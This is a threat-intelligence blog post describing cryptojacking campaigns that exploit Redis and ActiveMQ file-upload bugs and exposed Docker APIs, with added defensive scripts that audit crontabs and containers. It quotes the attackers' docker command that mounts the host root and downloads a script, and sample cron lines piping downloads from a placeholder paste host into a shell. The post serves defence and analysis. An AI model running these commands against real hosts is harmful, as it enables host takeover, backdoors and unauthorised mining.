Cryptojacking Criminals Are Using Multiple Techniques to Install Coinminers

Symantec has been tracking several cryptojacking campaigns that use bugs and exposed API ports to compromise computers.

Karthikeyan Kasiviswanathan
Threat Intel
5 min read · Nov 14, 2018


Symantec has blocked more than 309 million cryptojacking attempts in the last quarter and this number is likely to increase further as cyber criminals use every possible way to get their coinminers onto users’ computers. In our work to protect customers from cryptojacking, we have been tracking multiple campaigns taking advantage of various software vulnerabilities, as well as exposed APIs, to install miners on computers. We’ll take a closer look at a couple of these campaigns in this blog.

Campaign 1: Targeting vulnerabilities

Initial alert

From various sensors that Symantec has deployed around the world we noticed an attack on port 6379 exploiting an arbitrary file upload vulnerability in the open-source in-memory data structure store Redis.

Figure 1. Redis arbitrary file upload exploit setting up a cron job

The Redis vulnerability can be exploited by attackers to upload arbitrary files, which allows them to create entries in the crontab file. This allows the attackers to schedule cron jobs that download and execute a Bash script file hosted on Pastebin every minute. The Bash script downloads Base64-encoded data, also hosted on Pastebin. The decoded data is actually another Bash script that performs several actions including, but not limited to:

1. Ending other coin-mining processes running on the system

2. Downloading and running its own coin-mining programs

3. Setting up cron jobs, similar to the one shown in Figure 1

4. Adding an iptables rule to restrict access to port 6379 from the internet
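The persistence described above has a recognisable shape: a cron entry that fires every minute and pipes a download from a paste site straight into a shell. The following audit script is an added example (not code from the original post or from Symantec) that parses crontab text and flags entries combining those traits. The sample crontab lines, the pastebin.example host and the PLACEHOLDER paths are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not from the original post); the paste-site URL
# and script paths are placeholders standing in for what the campaign used.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/1 * * * * curl -fsSL https://pastebin.example/raw/PLACEHOLDER | sh
* * * * * wget -q -O- http://pastebin.example/raw/PLACEHOLDER | bash
30 2 * * 0 /usr/local/bin/backup.sh
*/5 * * * * /opt/monitor/check.sh
"""

# Tools that fetch content from the network.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# Fetched content piped directly into an interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b|\|\s*python\d?\b")
# Free hosting commonly abused as a payload staging point in these campaigns.
PASTE_HOST = re.compile(r"pastebin", re.IGNORECASE)


def runs_every_minute(schedule_fields: List[str]) -> bool:
    """True when the five cron fields describe a job that fires every minute."""
    minute = schedule_fields[0]
    return minute in ("*", "*/1") and all(f == "*" for f in schedule_fields[1:])


def parse_crontab(text: str) -> List[Dict[str, object]]:
    """Split crontab text into entries with their five schedule fields and command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # malformed line, not a scheduled command
        entries.append({"schedule": parts[:5], "command": parts[5], "raw": line})
    return entries


def score_entry(entry: Dict[str, object]) -> List[str]:
    """Return the suspicious traits found in one crontab entry."""
    reasons = []
    cmd = str(entry["command"])
    if runs_every_minute(list(entry["schedule"])):
        reasons.append("runs every minute")
    if DOWNLOADER.search(cmd):
        reasons.append("downloads from network")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes download into shell")
    if PASTE_HOST.search(cmd):
        reasons.append("fetches from paste site")
    return reasons


def find_suspicious_cron_jobs(text: str, min_reasons: int = 2) -> List[Dict[str, object]]:
    """Flag entries that combine at least `min_reasons` of the traits above."""
    flagged = []
    for entry in parse_crontab(text):
        reasons = score_entry(entry)
        if len(reasons) >= min_reasons:
            flagged.append({"raw": entry["raw"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in find_suspicious_cron_jobs(SAMPLE_CRONTAB):
        print(hit["raw"])
        print("   ->", ", ".join(hit["reasons"]))
```

Run it against the output of `crontab -l` for each user and the files under /etc/cron.d; a single trait (for example, a legitimate every-minute monitor) is not flagged on its own, which keeps the noise down while still catching the download-and-execute pattern the campaign relies on.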

Infection module

One of the functions found in the decoded Bash script is a single line of Python code that downloads another Base64-encoded Python script from Pastebin.

Figure 2. Python code that downloads payloads from Pastebin

The downloaded script, when decoded, reveals the campaign’s spreading mechanism, which makes use of a couple of vulnerabilities to spread further. The first vulnerability is an arbitrary file upload vulnerability (CVE-2016-3088) in the Fileserver web application in the open-source message broker ActiveMQ.

Figure 3. Snippet of exploit code for the arbitrary file upload vulnerability in the Fileserver web application in ActiveMQ

The second vulnerability is the arbitrary file upload vulnerability in Redis, which was the initial source for tracking down this campaign.

Figure 4. Snippet of exploit code for the Redis arbitrary file upload vulnerability

Also included in the Python script was a URL used to retrieve a list of target IP addresses. The IP addresses were downloaded from an image hosting site (thyrsi[dot]com).

Figure 5. Snippet of code responsible for downloading list of target IP addresses

The wallet address used in this campaign has a couple of worker IDs: one for the XMR-Stak coinminer (sixx) and another for the XMRig coinminer (sixy). Querying the wallet address online, however, shows a few more workers.

Figure 6. Different worker ID stats associated with the Monero account

Campaign 2: A different tactic via Docker

We also found a similar campaign where attackers are targeting open Docker API ports to download and execute coinminers. They start by scanning the internet for open ports 2375 (Docker REST API over HTTP) and 2376 (Docker REST API over HTTPS) using the Masscan tool. When an open instance is found, the attackers send a request to create a container with the following command:

docker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "wget http://IP/auto.sh -O /auto.sh;chmod 777 /auto.sh;sh /auto.sh;"

The “auto.sh” file performs several actions including, but not limited to:

1. Installing packages such as systemd, cURL, Masscan, iproute2, and OpenSSH

2. Adding the users “richard” and “frank” to the system

3. Establishing backdoor access to the machine by modifying the SSH config file to listen on port 7878 as well as port 22, enabling password authentication, and adding public keys to the SSH authorized_keys file

4. Using Masscan to scan the subnet (gathered from the infected machine) for other open 2375 and 2376 ports and using this information to spread through open Docker API ports

Finally, it downloads a script from Pastebin that ends other mining-related processes on the system and runs its own binaries for mining the Monero cryptocurrency.
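The container the attackers create in this campaign has a distinctive shape: it bind-mounts the host root into the container, chroots into it, and immediately downloads a script. The following script is an added example (not code from the original post or from Symantec) that audits records shaped like the JSON `docker inspect` returns (the HostConfig.Binds, HostConfig.Privileged, Config.Image and Config.Cmd fields) and flags containers with that shape. The three container records are constructed for illustration, and the PLACEHOLDER_IP stands in for the download host.

```python
import json
from typing import Any, Dict, List

# Constructed records shaped like `docker inspect` output; these are
# illustrative inputs, not real containers from the post.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "aaaa1111",
        "Config": {"Image": "alpine",
                   "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                           "wget http://PLACEHOLDER_IP/auto.sh -O /auto.sh;sh /auto.sh"]},
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
    },
    {
        "Id": "bbbb2222",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
    {
        "Id": "cccc3333",
        "Config": {"Image": "busybox", "Cmd": ["sleep", "infinity"]},
        "HostConfig": {"Binds": [], "Privileged": True},
    },
])

# Host paths whose bind mount effectively hands the container the host.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")


def host_path_of(bind: str) -> str:
    """Return the host side of a 'host:container[:options]' bind specification."""
    return bind.split(":", 1)[0]


def is_sensitive_mount(bind: str) -> bool:
    """True when the bind exposes the host root or another sensitive host path."""
    host = host_path_of(bind)
    if host == "/":
        return True
    return any(host == p or host.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_containers(inspect_json: str) -> List[Dict[str, Any]]:
    """Return one finding per container that shows signs of host takeover."""
    findings = []
    for container in json.loads(inspect_json):
        reasons = []
        host_cfg = container.get("HostConfig", {})
        cfg = container.get("Config", {})
        for bind in host_cfg.get("Binds") or []:
            if is_sensitive_mount(bind):
                reasons.append(f"sensitive host path mounted: {bind}")
        if host_cfg.get("Privileged"):
            reasons.append("privileged container")
        cmd = " ".join(cfg.get("Cmd") or [])
        if "chroot" in cmd:
            reasons.append("command chroots into a mount")
        if any(tool in cmd for tool in ("wget ", "curl ")):
            reasons.append("command downloads from the network at start")
        if reasons:
            findings.append({"id": container["Id"], "image": cfg.get("Image"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_containers(SAMPLE_INSPECT):
        print(finding["id"], finding["image"])
        for reason in finding["reasons"]:
            print("   ->", reason)
```

Feed it the output of `docker inspect $(docker ps -aq)` on a host you suspect; the first constructed record reproduces the mount-and-chroot pattern of the attackers’ `docker run` command above, while the nginx record shows that an ordinary read-only content mount is left alone.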

Protection

The following Symantec Intrusion Prevention System (IPS) detections protect customers from these attacks:

Attack: Redis UnAuthorized File Upload

Web Attack: Apache ActiveMQ CVE-2016-3088

Web Attack: Malicious Payload Upload 6

System Infected: Miner.Bitcoinminer Activity 7

Figure 7 shows Symantec IPS detections protecting users from these coin-mining attacks.

Figure 7. Symantec IPS detections protecting users from coin-mining attacks

Mitigation

Vendors have since published updates to address the vulnerabilities discussed in this blog. Symantec advises users to ensure their computers and software are fully patched. Docker users should avoid exposing Docker REST API ports on the internet and configure Docker to use TLS authentication to avoid attackers misusing it.

Further reading

For more information on cryptojacking, read the following:

Cryptojacking: A Modern Cash Cow

Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.
